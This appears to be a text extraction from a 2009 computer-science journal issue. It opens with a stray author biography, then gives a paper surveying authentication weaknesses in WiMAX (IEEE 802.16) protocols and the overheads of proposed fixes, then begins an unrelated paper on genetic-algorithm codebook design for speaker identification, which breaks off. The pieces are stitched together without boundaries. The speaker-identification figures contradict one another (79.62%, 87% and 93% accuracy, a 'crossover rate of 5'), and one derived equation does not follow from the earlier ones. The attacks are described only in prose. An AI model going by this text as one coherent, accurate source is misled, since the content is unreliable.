Mrs. Shanmugapriya D. received the B.Sc. and M.Sc. degrees in Computer Science from Avinashilingam University for Women, Coimbatore, in 1999 and 2001 respectively. She received the M.Phil. degree in Computer Science from Manonmaniam Sundaranar University, Thirunelveli, in 2003 and is pursuing her Ph.D. at Avinashilingam University for Women. She is currently working as a Lecturer in Information Technology at the same university and has eight years of teaching experience. Her research interests are biometrics, network security and system security.
Computational Complexities and Breaches in
Authentication Frameworks of Broadband Wireless Access (BWA)
Raheel Maqsood Hashmi[1], Arooj Mubashara Siddiqui[2], Memoona Jabeen[3],
Khurram S. Alimgeer, Shahid A. Khan
Department of Electrical Engineering
COMSATS Institute of Information Technology, Islamabad, Pakistan
[1]rahilmh@gmail.com, [2]aroojmubashara@gmail.com, [3]memoona.jabeen@gmail.com
Abstract — Secure access of communication networks has become an increasingly important area of consideration for present-day communication service providers. Broadband Wireless Access (BWA) networks are proving to be an efficient and cost-effective solution for the provisioning of high-rate wireless traffic links in static and mobile domains. The secure access of these networks is necessary to ensure their proper operation and revenue efficacy. Although the authentication process is key to secure access in BWA networks, the breaches present in it limit the network's performance. In this paper, the vulnerabilities in the authentication frameworks of BWA networks are unveiled. Moreover, this paper also describes the limitations of these protocols, and of the solutions proposed for them, due to the computational complexities and overheads involved. The possible attacks on the privacy and performance of BWA networks are discussed and explained in detail.

Keywords- Computational Complexity; Authentication; Security; Privacy; Key Management.
I. INTRODUCTION
Broadband Wireless Access (BWA) is rapidly emerging as the standard for future communication networks. The ease of deployment combined with low operational and maintenance costs makes BWA the preferred choice for modern communication service providers. BWA or WiMAX (Worldwide Interoperability for Microwave Access) networks work on the protocols defined in the IEEE 802.16 standard [1]. IEEE 802.16 has two revisions: 802.16d, termed fixed WiMAX, and 802.16e, termed mobile WiMAX [2]. Deployments of WiMAX networks are growing rapidly to achieve seamless mobility followed by worldwide broadband communications.
Authentication of users and of equipment in a BWA network is done as part of the admission control process. The authentication phase is also carried out during the execution of handoffs in mobile BWA networks. The authentication and service authorization process is carried out at the privacy sub-layer, embedded in the WiMAX protocol stack [1], [3]. A complete protocol ensuring secure distribution and management of keying data between network entities is incorporated in this layer, known as the Privacy and Key Management (PKM) protocol [1]. The launch of 802.16d in 2004 and 802.16e in 2005 suggests that the standard is in the initial phase of implementation, and several dormant issues and shortcomings will be highlighted as deployment and service provisioning progress.
Network security and legitimate service access is a concealed performance indicator in providing Quality of Service (QoS) to users. In this paper, the pitfalls in the current authentication frameworks are unveiled, the reasons for the breaches are identified, and the causes are analyzed to highlight the limitations of the existing protocols.
The rest of the paper is organized as follows. Section II introduces the existing authentication frameworks. Section III describes the attacks on authentication. Section IV highlights the computational complexities and overheads involved in the existing protocols, and Section V concludes our discussion.
II. AUTHENTICATION FRAMEWORKS
A. Privacy & Key Management Protocol version 1:
The PKM v1 protocol complies with the 802.16d-2004 standard and operates in fixed WiMAX networks. It is a 3-step protocol involving 1-way authentication. Figure 1 shows the PKM v1 authentication model and the messages involved.
Figure 1. Privacy and Key Management Protocol version 1 [5]
The detailed operation of PKM v1 can be found in [1], [4] and [5]. PKM v1 is based on an X.509 certificate-based Public
Key Infrastructure (PKI). Figure 1 shows the information flow between the Subscriber Station (SS) and the Base Station (BS). The individual components of the messages have been addressed in [1] and [5]. In step 2, a nonce (NSS) is shown, which is a 64-bit number generated randomly to be used as a message-linking token [4]. The Basic Connection Identity Code (BCID) is used to identify a particular node in the network and is assigned to the node during the admission control process.
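The role of the nonce as a message-linking token can be sketched as follows. This is a simplified illustration, not the 802.16 wire format; the function names and dictionary fields are hypothetical. The requester generates a 64-bit nonce and accepts only responses that echo it, so a response replayed from an earlier session is rejected.

```python
# Simplified sketch of nonce-based message linking (not the 802.16 format).
import secrets

def new_nonce():
    """Generate a 64-bit random nonce, used to link protocol messages."""
    return secrets.randbits(64)

def make_request(nonce, payload):
    return {"nonce": nonce, "payload": payload}

def response_matches(request, response):
    # A responder must echo the requester's nonce; a response replayed from
    # an earlier session carries a stale nonce and is rejected.
    return response.get("nonce") == request["nonce"]

n_ss = new_nonce()
request = make_request(n_ss, "auth-request")
fresh = {"nonce": n_ss, "payload": "auth-reply"}
stale = {"nonce": (n_ss + 1) % 2 ** 64, "payload": "auth-reply"}  # wrong nonce
print(response_matches(request, fresh))  # True
print(response_matches(request, stale))  # False
```

Because the nonce is unpredictable, an attacker cannot pre-compute a matching response, although, as discussed later, nonces alone do not stop an attacker who relays messages within the same live session.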
B. Privacy & Key Management Protocol version 2:
The PKM v2 protocol was defined in 802.16e-2005 and is implemented in mobile WiMAX networks. This protocol is not essentially a variant of PKM v1; however, PKM v1 and v2 share a common service authorization structure. PKM v2 is a 4-step, 3-way authentication protocol. The operational mechanism of PKM v2 is illustrated in [2] and [6]. Figure 2 depicts the PKM v2 authentication framework.
Figure 2. Privacy and Key Management Protocol version 2 [6]
The major enhancements in PKM v2 are the inclusion of digital signatures (DS) and an authorization acknowledgement step. Moreover, except in step 1, a nonce (NSS or NBS) has been incorporated with each message to link successive steps of the protocol.
C. The Time Stamp Authorization (TSA) Model:
This model was proposed by Sen Xu et al. in [7] and introduces timestamps to ensure message authenticity. The proposal is a variant of PKM v1 in which timestamps are placed on all messages to certify their freshness. Each node in the network (BS or SS) maintains a timestamp table containing the timestamps of all messages received, thereby preventing message replays. Furthermore, a key management strategy for inter-BS key management and exchange has also been proposed along with this protocol in [7]. This model specifically focuses on and enhances the PKM v1 authorization model and is aimed at fixed WiMAX networks.
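The timestamp-table mechanism can be sketched as follows. This is a simplified, hypothetical illustration: the freshness window, class name and message shape are assumptions, and the paper's inter-BS key exchange is not modeled. A receiver rejects any message older than a freshness window, and any (sender, timestamp) pair it has already recorded.

```python
# Simplified sketch of a per-node timestamp table for replay prevention.
FRESHNESS_WINDOW = 5.0  # seconds; an illustrative value, not from the paper

class TimestampTable:
    def __init__(self):
        self.seen = set()

    def accept(self, sender, timestamp, now):
        # Reject messages older than the freshness window.
        if now - timestamp > FRESHNESS_WINDOW:
            return False
        # Reject exact replays of a previously recorded message.
        if (sender, timestamp) in self.seen:
            return False
        self.seen.add((sender, timestamp))
        return True

table = TimestampTable()
print(table.accept("SS-1", 100.0, 101.0))  # True: fresh and unseen
print(table.accept("SS-1", 100.0, 102.0))  # False: replay of the same message
print(table.accept("SS-1", 90.0, 101.0))   # False: stale timestamp
```

Note that this mechanism assumes synchronized clocks; the suppress-replay attack discussed below exploits exactly that assumption.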
D. Hybrid Authorization (HA) Model:
Ayesha Altaf et al., in [6], propose a model which employs a hybrid approach involving nonces and timestamps to prevent attacks on privacy and key management protocols. The proposal claims to counter the interleaving attacks discussed in [7] and [8], which may occur on PKM v2. The approach is presented for mobile WiMAX networks and enhances the PKM v2 authentication framework.
E. Improved Secure Network Authentication Protocol:
This model has been proposed in [4] and aims to restructure the authentication framework by introducing a single protocol for both fixed and mobile networks. It has been introduced to cover some of the major threats highlighted in [6], [7] and [9]. The Improved Secure Network Authentication Protocol (ISNAP) has been designed and optimized to utilize the existing system resources with minimum overhead. The proposed model of ISNAP is shown in figure 3.
Figure 3. Improved Secure Network Authentication Protocol [4]
The detailed structure and working of ISNAP are discussed in [4].
III. ATTACKS ON AUTHENTICATION
Attacks on authentication can be described as the ways in which a network can be intruded upon and the privacy of its users compromised. Secure access to network services is becoming an increasingly important issue in present communication infrastructures. Any attempt by an interloper to register with the network illegitimately, or to create chaos in it, becomes possible if the user authentication and authorization stage is compromised. Therefore, the ways of breaching the authentication frameworks are termed attacks on the privacy and key management protocols and their variants.
A. Water-Torture Attack:
The Water-Torture attack aims to perturb the network's operation by causing flooding. Some messages are used to initiate cyclic processes when received at a node. The transmission of such a message can be seen in figures 1 and 2 as Mcer SS, the manufacturer's X.509 certificate, which is used by the SS to announce its presence in the network and to initiate the authentication protocol [5]. In the admission control process, the reception of this message at the BS initiates the cyclic authentication procedure. In a Water-Torture attack, these triggering messages are captured and transmitted in a loop to cause trigger flooding, thus
creating artificial congestion at the BS. This attack can be extended to create management chaos and blocking in the network's domain, especially where remote power feeding is employed. PKM v1 and v2, the TSA model and the HA model are affected by this attack, as there is no method to detect whether Mcer SS has been transmitted by an authentic SS or replayed by an intruder.
B. Denial of Service Attack:
When dealing with radio frequency networks, we come across certain entities which maintain a cause-and-effect relationship between them. Denial of Service (DoS), in this case, is one of the results of the Water-Torture attack. Due to the engaged resources and falsified congestion, requests for authentication, key exchange and admission to the network are not entertained. This causes a severe degradation of QoS, resulting in heavy revenue losses. The protocols subject to the Water-Torture attack are, naturally, also subject to the DoS attack.
C. Message Replay Attack:
This attack covers, under its footprint, a large number of intrusion methods based on the described approach. It involves the capture and re-use of messages in the authentication cycles. The re-use can be based on a specific message or on a set of messages exchanged during a complete session. PKM v1 is not supported by any mechanism to counter this attack. However, PKM v2 partially counters it by employing a nonce in messages 2 and 3, as shown in figure 2. The nonce, being a 64-bit random number, has only a 1-in-2^64 probability of repetition and is very difficult to predict. It does prove useful for linking subsequent messages and helps to resolve the replay issues to a partial extent. Hence, PKM v1 is a victim of replay attacks, while PKM v2 is partially, but not completely, secure. The TSA model proposes timestamps instead of nonces, while the HA model demands the use of nonces in conjunction with timestamps, but both models present significant overhead, as discussed in the next section.
D. Identity Theft:
SS equipment in the network is provisioned with services on the basis of the physical address (MAC address) registered in the network. In fixed BWA networks, the MAC identities are registered permanently for each SS; however, in mobile BWA networks, the MAC ID is registered each time a node joins the network or performs a handoff. Hence, PKM v1 is not exposed to this attack; but, as shown in figure 2, PKM v2 and the HA model are vulnerable to it, since message 4 contains the MAC identity in both encrypted and unencrypted form. Several devices are available at the present day which can be reprogrammed with variable MAC addresses [6], [9].
E. Impersonation:
Impersonation refers to the type of attack in which one node masquerades as another node. There are several ways in which impersonation can be achieved, for example by message replay or by exploiting one-way authentication [12]. The PKM v1 model and the Time-Stamp authentication model are vulnerable to this type of infringement attempt. The reason is one-way authentication: the BS authenticates the SS, but not vice versa. Moreover, this attack aims to compromise the security of the users and poses severe threats where BWA infrastructure is employed in security and defense installations of any realm.
F. Interleaving Attack:
The interleaving attack is a sub-class of man-in-the-middle attacks and is specifically aimed at PKM v2. In this attack, an adversary interleaves a communication session by maintaining connections with both the BS and the SS, posing as the SS to the BS and vice versa. All information en route passes through the adversary node, and thus an information leakage point is built [8]. The backbone of the interleaving attack is the re-transmission of a set of messages from the same session. The HA model proposes an approach to counter the interleaving attack by introducing transmission and storage overheads in the network [6].
G. Suppress Replay Attack:
This method of gaining forged access to network services takes advantage of the fact that perfect clock synchronization must be maintained to protect the authentication session from intrusion. Owing to loss of synchronization between the clocks of the entities, an intruder can gain control of the authentication framework by capturing messages and re-transmitting them with added delays, thus causing forward message replay [6]. This class of attack is difficult to counter; the Timestamp Authentication model is vulnerable to it, and the Hybrid Authentication model can also be manipulated by this attack.
IV. COMPUTATIONAL COMPLEXITIES AND OVERHEADS
The Timestamp Authentication (TSA) model, the Hybrid Authentication (HA) model and ISNAP have been put forth to remove the threats posed to the standardized protocols PKM v1 and PKM v2. The first two models target their predecessors, PKM v1 and PKM v2 respectively, for removal of threats, whereas ISNAP offers a single solution for fixed and mobile BWA networks, solving the existing problems. The proposed models, along with the enhancements, incur the computational complexities and storage overheads discussed in this section.
A. Timestamp Validation:
ISSN 1947-5500
(IJCSIS) International Journal of Computer Science and Information Security, Vol. 4, No. 1, 2009
Timestamps are freshness guards for messages. These timestamps, used to eliminate replays, are recorded in timestamp tables. These tables contain the timestamps of all messages previously received, and the timestamp of any newly received message is compared against the recorded ones. The presence of the newly received timestamp in the tables leads to the detection of a replay; otherwise, the message is validated.
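The table-lookup procedure described above can be sketched in a few lines of Python; the dict-of-sets layout and the names used here are purely illustrative, not taken from the standard:

```python
# Replay detection via a per-peer timestamp table, as described above.
seen = {}   # peer_id -> set of timestamps already accepted

def accept(peer_id, ts):
    """Return False (replay detected) if ts was already recorded for this
    peer; otherwise record it and validate the message."""
    table = seen.setdefault(peer_id, set())
    if ts in table:
        return False        # timestamp found in the table: replay
    table.add(ts)
    return True             # fresh timestamp: message validated

print(accept("SS-1", 1000))  # True  (first time this timestamp is seen)
print(accept("SS-1", 1000))  # False (same timestamp again: replay)
```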
The timestamp tables consume memory for the storage of
prior timestamps from messages and also consume a large
number of computational cycles to compare the arriving
timestamp with the recorded ones. Let ∂ be the number of
bytes in memory required to store one timestamp and ρ be the number of days for which the records are maintained in the table. Then we have (1) as:

χ = μ × ∂ × ρ (1)

where χ is the storage overhead caused by the timestamp tables, expressed in bytes/node, and μ is the minimum number of messages exchanged between two communicating nodes per day. Generally, to counter replays, timestamp records are maintained in the tables for an optimum amount of time. Thus, assuming ∂ and ρ to be 4 bytes (as in a UNIX-based environment) and 15 days, and taking μ to be a minimum of 100 messages validated per day, the value of χ approaches 6 Kilobytes to be maintained for each node. Hence, for a BS serving 64 SSs, this can lead to 0.3 Megabytes of minimum static memory reserved by timestamp tables at each BS.
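The worked figures above follow directly from (1) and can be checked with a short calculation; the variable names mirror the quantities in the text (bytes per timestamp, retention days, messages per day):

```python
# Storage overhead of a timestamp table, following Eq. (1): chi = mu * bytes * days.
def timestamp_table_overhead(mu, delta_bytes, rho_days):
    """Bytes of timestamp storage one node must reserve."""
    return mu * delta_bytes * rho_days

chi = timestamp_table_overhead(mu=100, delta_bytes=4, rho_days=15)
print(chi)        # 6000 bytes, i.e. about 6 KB per node
print(chi * 64)   # 384000 bytes in total for a BS serving 64 SSs
```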
A very general implementation of timestamp comparison on a UNIX-based operating system suggests that a minimum of 2 floating point instructions is used for the comparison of one timestamp. Therefore, the machine cycles used to validate one incoming message can be calculated by (2) as:

α = 2 × μ × ρ (2)

where α is the number of computational cycles used in the timestamp validation process. Thus, we can have the number of floating point instructions per second (FLOPS) in (3) as:

FLOPS = α × (σ)⁻¹ (3)

where σ is the number of machine cycles per second for any particular system (SS or BS). The above analysis suggests that the number of FLOPS used in the timestamp validation process will be significantly large, depending upon the amount of records maintained and the constriction time required to counter replay attacks. Substituting from (1), the final expression for the number of FLOPS becomes:

FLOPS = (2 × χ / ∂) × (σ)⁻¹ (4)
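Assuming two floating-point instructions per stored timestamp and the 100 messages/day, 15-day retention of the worked example above, the per-message comparison cost is:

```python
# Comparison cost per validated message: two floating-point instructions per
# stored timestamp, with mu * rho timestamps retained per peer.
mu, rho = 100, 15          # messages/day and retention days, as in the text
alpha = 2 * mu * rho       # comparison instructions per arriving message
print(alpha)               # 3000 floating-point instructions per message
```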
The above analysis suggests that the storage overhead is quite significant in terms of reserving memory resources for any system, and can be optimized by enhancement of the timestamp-table comparison method. The proposed models to rectify the threats discussed in Section III, the TSA model and the HA model, are subject to the severe limitations discussed above. The ISNAP model, however, offers a replacement for the timestamp-table method by providing a validation procedure based on mathematical evaluation [4]. In this case, a timestamp is subjected to a mathematical condition; if the condition is fulfilled, the message is validated, otherwise the message is rejected. Therefore, ISNAP's validation procedure reduces the storage overheads considerably by removing the need for maintaining record tables.
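The exact mathematical condition ISNAP applies is specified in [4]. Purely as an illustration of the general idea of a stateless check replacing table lookups, a freshness-window test might look as follows; the window `delta_max` and the function name are assumptions for the sketch, not values taken from [4]:

```python
import time

def validate_timestamp(ts, delta_max=2.0, now=None):
    """Stateless freshness check: accept a message only if its timestamp
    lies within delta_max seconds of the receiver's clock.  No table of
    prior timestamps is kept, so the storage overhead of Eq. (1) vanishes."""
    if now is None:
        now = time.time()
    return abs(now - ts) <= delta_max

now = 1_000_000.0
print(validate_timestamp(now - 1.0, now=now))   # True: fresh message
print(validate_timestamp(now - 30.0, now=now))  # False: stale or replayed
```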
B. Transmission Overheads:
In order to minimize the posed threats, different sentinels have to be introduced into the authentication frameworks. This increases the transmission overhead of the verification procedures, thereby establishing a cost-and-benefit relationship between security and increased transmission.
Figure 4. Transmission Overheads
Figure 4 shows the comparative transmission overheads of the proposed models against their standardized counterparts. The ISNAP model incurs less transmission than the Hybrid Authentication model by removing some redundant components, such as the unencrypted MAC ID in the last message. Compared with the TSA model, which is a variant of PKM v1 (the fixed-network protocol), ISNAP requires substantially more transmission. However, the cost-and-benefit relation is justified by the removal of several major attacks in ISNAP and the reduction in storage resources.
Combining storage and transmission overheads, the maximum operating cost is incurred by the proposed HA model, after which the TSA model and the ISNAP model have comparable outlays. However, based on the performance of these proposed solutions, ISNAP provides optimum protection against intrusion and unauthorized use of network resources.
C. Resynchronization Scheme:
The involvement of clock based parameters in
authentication procedures suggests that the clocks of the
involved systems must be well synchronized to allow for a
successful handshake between the intervening nodes. The
synchronization scheme in WiMAX networks has remained an open issue, as discussed in [10], and there remains a probability of errors in the clocks [11], allowing intrusion activity. Although the ISNAP model suggests a solution to this issue, the analysis and implementation of the synchronization schemes have yet to be performed to reach a satisfactory conclusion.
D. Initiation of Authentication Procedure:
In PKM v1, PKM v2, the Timestamp Authentication model and the Hybrid Authentication model, the trigger message initiating the handshake procedure cannot be protected against the class of replay attacks. The ISNAP model proposes a solution to this vulnerability but demands that the clocks be synchronized.
V. CONCLUSION
The authentication protocols standardized for WiMAX/BWA networks are faced with a number of vulnerabilities which are critical to smooth operation of the network and demand serious attention. The proposed solutions to the posed threats have been, to some extent, successful in sorting out the issues, but are not feasible enough in terms of the complexities and overheads they introduce. The ISNAP model, however, has been optimum in terms of solving the security issues while offering optimized use of resources. Nevertheless, optimization of the validation procedures and the finest use of system resources to furnish secure network access is still required and demands more research in this area.
REFERENCES
[1] IEEE Computer Society and the IEEE Microwave Theory and Techniques Society, IEEE Std 802.16-2004, "Part 16: Air Interface for Fixed Broadband Wireless Access Systems", June 2004.
[2] IEEE Std. 802.16e/D12, “IEEE Standard for Local and MetropolitanArea Networks, part 16: Air Interface for Fixed and Mobile BroadbandWireless Access Systems”, IEEE Press, 2005.
[3] Jeffrey G. Andrews, Arunabha Ghosh, Rias Muhamed, “Fundamentalsof WiMAX: Understanding Broadband Wireless Networking”, Chapter 9: MAC Layer of WiMAX , Pearson Education Prentice Hall, 2007. ISBN(PDF) 0-13-222552-2
[4] R. M. Hashmi et. al., “Improved Secure Network AuthenticationProtocol (ISNAP) for IEEE 802.16”, Proceedings of 3rd IEEEInternational Conference on Information and CommunicationTechnologies, August 2009.
[5] Sen Xu, Manton Matthews, Chin-Tser Huang. “Security issues in privacy and key management protocols of IEEE 802.16”, Proceedings of the 44th annual Southeast regional conference, pp. 113-118, ISBN 1-59593-315-8, 2006.
[6] Ayesha Altaf, M. Younus Javed, Attiq Ahmed, “Security Enhancementsfor Privacy and Key Management Protocol in IEEE 802.16e-2005”,Proceedings of the 9th ACIS International Conference on softwareEngineering, Artificial Intelligence, Networking and Parallel/DistributedComputing, pp. 335-339, 2008.
[7] Sen Xu, Chin-Tser Huang, “Attacks on PKM Protocols of IEEE 802.16and Its Later Versions”, Computer Science and Engineering Department,University of South Carolina, Columbia, September, 2006.
[8] Gavin Lowe, "A Family of Attacks upon Authentication Protocols", Department of Mathematics and Computer Science, University of Leicester, January 1997.
[9] Michel Barbeau, “WiMax/802.16 Threat Analysis”, School of Computer Science Carleton University, Ontario, Canada, October, 2005.
[10] Hao Zhou, Amaresh V. Malipatil and Yih-Fang Huang.,“Synchronization issues in OFDM systems”, Circuits and Systems,IEEE-APCCAS, pp. 988 – 991, 2006.
[11] Li Gong , “A Security Risk of depending on Synchronized Clocks”,ORA Corporation and Cornell University, September 24, 1991.
[12] David Johnston, Jesse Walker, “Overview of IEEE 802.16 Security,”IEEE Security & Privacy, June 2004.
AUTHORS PROFILE
Manuscript received 30 July 2009.
Memoona Jabeen completed Electrical Engineering
degree from CIIT, Islamabad, Pakistan in 2009. She has
International Research Publications in the area of Secure
Wireless Access and Cryptographic Methods.
Khurram S. Alimgeer did his Bachelors degree in IT in 2002 and completed his MS in Telecommunications with distinction in 2006. He has been with the Dept. of Electrical Engineering, CIIT since 2003 and has been supervising extensive research work. Currently, he is an Assistant Professor at CIIT and is also working as a doctoral researcher. His areas of research include Wireless Communications, Image Processing and Antenna Design.
Arooj M. Siddiqui completed her Electrical (Telecom.) Engineering degree at the Dept. of Electrical Engineering, CIIT, Islamabad in 2009. She is a graduate student and researcher and has contributed to the area of Authentication in BWA Networks.
Raheel M. Hashmi is a graduate student enrolled in MS Engineering at Politecnico di Milano, Italy. He completed his degree in Electrical Engineering at COMSATS Institute of Information Technology (CIIT), Islamabad in 2009 and received the Gold Medallion Award. He has research contributions in the area of Wireless Networking and Security.
Professor Dr Shahid A. Khan did his Bachelors in Electrical Engineering in 1988 from UET Taxila. He did his MS in Electrical and Electronics Engineering and Ph.D. in Communications at the University of Portsmouth, UK. Since then, he has been involved in significant R&D work with research giants such as European Antennas Ltd. UK, Newt International Ltd. UK and WAPDA. He joined CIIT in 2003 and is at present serving as Dean, Faculty of Engineering, CIIT. He has significant research contributions in the field of Wireless Networks.
Codebook Design Method for Noise Robust
Speaker Identification based on Genetic Algorithm
Md. Rabiul Islam
Department of Computer Science & Engineering
Rajshahi University of Engineering & Technology
Rajshahi-6204, Bangladesh.
rabiul_cse@yahoo.com

Md. Fayzur Rahman
Department of Electrical & Electronic Engineering
Rajshahi University of Engineering & Technology
Rajshahi-6204, Bangladesh.
mfrahman3@yahoo.com
Abstract— In this paper, a novel method of designing a codebook for noise-robust speaker identification using a Genetic Algorithm is proposed. A Wiener filter has been used to remove the background noise from the source speech utterances.
Speech features have been extracted using standard speech
parameterization method such as LPC, LPCC, RCC, MFCC,
ΔMFCC and ΔΔMFCC. For each of these techniques, the
performance of the proposed system has been compared. In this
codebook design method, the Genetic Algorithm has the capability of reaching a globally optimal result and hence improves the quality of the codebook. Using the NOIZEOUS speech database, the experimental results show that 79.62% accuracy has been achieved.
Keywords- Codebook Design; Noise Robust Speaker
Identification; Genetic Algorithm; Speech Pre-processing; Speech
Parameterization.
I. INTRODUCTION
Speaker identification is the task of finding the identity of an unknown speaker within a stored database of speakers. There are various techniques for the automatic speaker identification problem [1, 2, 3], and the HMM is one of the most successful classifiers for speaker identification systems [4, 5]. To implement a speaker identification system in a real-time environment, codebook design is essential. The LBG algorithm is the most popular codebook design method due to its simplicity [6], but its limitations are the local-optimum problem and its low speed. It is slow because, in each iteration, determining each cluster requires that every input vector be compared with all the codewords in the codebook. Other methods exist, such as the modified K-means (MKM) algorithm [7] and designing codewords from the trained vectors of each phoneme and grouping them together into a single codebook [8]. The above methods perform well in noiseless environments, but system performance degrades under noisy environments.
This paper presents an efficient approach to codebook design for an HMM-based, real-time, closed-set, text-dependent speaker identification system under noisy environments. To remove background noise from the speech, a Wiener filter has been used. Efficient speech pre-processing techniques and different feature extraction techniques have been considered to improve the performance of the proposed noise-robust codebook design method for speaker identification.
II. SYSTEM OVERVIEW
The proposed codebook design method can be divided into two operations: the encoder and the decoder. The encoder takes the input speech utterance and outputs the index of the codeword with minimum distortion; to find the minimum distortion, different genetic algorithm operations are used. In the decoding phase, when the decoder receives the index, it translates the index to its associated speaker utterance. Fig. 1 shows the block diagram of the proposed codebook design method.
Figure 1. Paradigm of the proposed codebook design method.
III. SPEECH SIGNAL PRE-PROCESSING
To capture the speech signal, a sampling frequency of 11025 Hz, a sampling resolution of 16 bits, a mono recording channel and the *.wav recorded file format have been used. The speech pre-processing part plays a vital role in the efficiency of learning. After acquisition of the speech utterances, a Wiener filter has been used to remove the background noise from the original speech utterances [9, 10, 11]. A speech end-point detection and silence removal algorithm has been used to detect the presence of speech and to remove pulses and silences in background noise [12, 13, 14, 15, 16]. To detect word boundaries, the frame energy is computed using the short-term log energy equation [17],
E_t = 10 log10 ( Σ_{i=n_t}^{n_t+N−1} S_i² ) (1)
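As a concrete illustration of the word-boundary idea, the short-term log energy of Eq. (1) can be evaluated per frame in a few lines of Python; the frame length and the toy signal below are arbitrary choices for the sketch:

```python
import math

def frame_log_energies(samples, frame_len):
    """Short-term log energy per frame, following Eq. (1):
    E_t = 10 * log10( sum of squared samples in frame t )."""
    energies = []
    for start in range(0, len(samples) - frame_len + 1, frame_len):
        e = sum(s * s for s in samples[start:start + frame_len])
        energies.append(10.0 * math.log10(e + 1e-12))  # small floor avoids log(0)
    return energies

# A near-silent frame followed by a loud frame: the energy jump marks
# the word boundary.
signal = [0.001] * 80 + [0.5, -0.4, 0.6, -0.5] * 20
e_silence, e_speech = frame_log_energies(signal, 80)
print(e_speech - e_silence)   # large positive jump at the speech onset
```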
Pre-emphasis has been used to balance the spectrum of voiced sounds, which have a steep roll-off in the high-frequency region [18, 19, 20]. The transfer function of the FIR filter in the z-domain is [19]:

H(z) = 1 − α · z⁻¹, 0 ≤ α ≤ 1 (2)

where α is the pre-emphasis parameter.
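In the time domain, the filter of Eq. (2) is simply y[n] = x[n] − α·x[n−1]. A minimal sketch, with α = 0.95 as a typical (assumed) value:

```python
def pre_emphasis(samples, alpha=0.95):
    """FIR pre-emphasis filter of Eq. (2): y[n] = x[n] - alpha * x[n-1]."""
    out = [samples[0]]                     # first sample passes through
    for n in range(1, len(samples)):
        out.append(samples[n] - alpha * samples[n - 1])
    return out

# Steady DC input is attenuated to ~0.05 after the first sample,
# while high-frequency content would pass almost unchanged.
print(pre_emphasis([1.0, 1.0, 1.0, 1.0]))
```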
Frame blocking has been performed with an overlap of 25% to 75% of the frame size; typically, a frame length of 10-30 milliseconds is used. The purpose of the overlapping analysis is that each speech sound of the input sequence is approximately centered in some frame [21, 22].
Among the different windowing techniques, the Hamming window has been used for this system. The purpose of windowing is to reduce the effect of the spectral artifacts that result from the framing process [23, 24, 25]. The Hamming window can be defined as follows [26]:

w(n) = 0.54 − 0.46 cos(2πn/N), −(N−1)/2 ≤ n ≤ (N−1)/2; 0 otherwise (3)
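Frame blocking and windowing together can be sketched as follows. The window is written here in the common zero-based form 0.54 − 0.46·cos(2πn/(N−1)), which differs from the centered form of Eq. (3) only by an index shift; the 20 ms frame length and 50% overlap are illustrative choices within the ranges stated above:

```python
import math

def hamming(N):
    """Hamming window in the common zero-based form over n = 0..N-1."""
    return [0.54 - 0.46 * math.cos(2.0 * math.pi * n / (N - 1)) for n in range(N)]

def frames(samples, frame_len, overlap=0.5):
    """Frame blocking with the stated overlap, each frame Hamming-windowed."""
    step = int(frame_len * (1.0 - overlap))
    w = hamming(frame_len)
    return [[s * wn for s, wn in zip(samples[i:i + frame_len], w)]
            for i in range(0, len(samples) - frame_len + 1, step)]

fs = 11025                      # sampling rate used in the paper
frame_len = int(0.020 * fs)     # a 20 ms frame within the 10-30 ms range
print(len(hamming(frame_len)))  # 220 window coefficients
```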
IV. SPEECH PARAMETERIZATION
This stage is very important in an ASIS because the quality of the speaker modeling and pattern matching strongly depends on the quality of the feature extraction methods. For the proposed ASIS, different speech feature extraction methods [27, 28, 29, 30, 31, 32], namely RCC, MFCC, ΔMFCC, ΔΔMFCC, LPC and LPCC, have been applied.
V. APPLICATION OF GENETIC ALGORITHM
The Genetic Algorithm [33, 34, 35, 36] has been applied in two ways, for encoding and decoding. In encoding, every speaker utterance is compared with an environmental noise utterance and groups are formed; in each group, one utterance is selected and defined as the codeword of that group. As a result of encoding, a number of groups are defined, each led by one speaker utterance. In decoding, when an unknown speaker utterance comes to the system, it is matched against the leading utterances; the unknown utterance is then searched for within the selected group.
In the GA processing, selection, crossover and mutation operators have been used. The fitness function is expressed as follows:

Fitness = (Unknown speech × Each stored speech) (4)
In the recognition phase, for each unknown group andspeaker within the group to be recognized, the processingshown in Fig. 2 has been carried out.
Figure 2. Recognition model on Genetic Algorithm.
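The paper gives no pseudocode for its GA, and Eq. (4) leaves the fitness operator implicit, so the following is only a shape sketch of GA-based codebook design under common assumptions: fitness as (negative) quantization distortion, elitist selection, one-point crossover and Gaussian mutation. Every name and parameter value here (ga_codebook, pop_size, the mutation scale, the toy training vectors) is illustrative, not taken from the paper:

```python
import random

random.seed(42)

def distortion(codebook, training):
    """Total squared error of the training vectors against their nearest
    codeword: the quantity a codebook design seeks to minimize."""
    total = 0.0
    for v in training:
        total += min(sum((a - b) ** 2 for a, b in zip(v, c)) for c in codebook)
    return total

def ga_codebook(training, n_codewords=2, pop_size=12, generations=30,
                crossover_rate=0.5, mutation_rate=0.1):
    """Evolve a codebook: each chromosome is a flattened set of codewords."""
    dim = len(training[0])
    genes = n_codewords * dim

    def decode(chrom):
        return [chrom[i * dim:(i + 1) * dim] for i in range(n_codewords)]

    pop = [[random.uniform(-1.0, 1.0) for _ in range(genes)]
           for _ in range(pop_size)]
    for _ in range(generations):
        pop.sort(key=lambda c: distortion(decode(c), training))
        elite = pop[: pop_size // 2]              # selection: keep the best half
        children = []
        while len(elite) + len(children) < pop_size:
            p1, p2 = random.sample(elite, 2)
            if random.random() < crossover_rate:  # one-point crossover
                cut = random.randrange(1, genes)
                child = p1[:cut] + p2[cut:]
            else:
                child = p1[:]
            for i in range(genes):                # Gaussian mutation
                if random.random() < mutation_rate:
                    child[i] += random.gauss(0.0, 0.1)
            children.append(child)
        pop = elite + children
    best = min(pop, key=lambda c: distortion(decode(c), training))
    return decode(best)

# Two well-separated clusters of toy "feature vectors".
training = [[0.0, 0.0], [0.1, -0.1], [1.0, 1.0], [0.9, 1.1]]
book = ga_codebook(training)
print(distortion(book, training))  # small residual distortion
```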
VI. OPTIMUM PARAMETER SELECTION ON GENETIC
ALGORITHM
A. Experiment on the Crossover Rate
The identification rate has been measured for various crossover rates. Fig. 3 shows the comparison among the results for different crossover rates; the highest identification rate of 87.00% was achieved at a crossover rate of 5.
Figure 3. Performance comparison among different crossover rates.
B. Experiment on the No. of Generations
The number of generations has also been varied to measure the best performance of this codebook design method. For generation counts of 5, 10 and 20 (with crossover rate 5), a comparative identification rate was found,
which is shown in Fig. 4. When the comparison is continued up to the 5th generation, the highest speaker identification rate of 93.00% is achieved.
Figure 4. Performance comparison among various numbers of generations.
VII. PERFORMANCE ANALYSIS OF THE PROPOSED CODEBOOK DESIGN METHOD
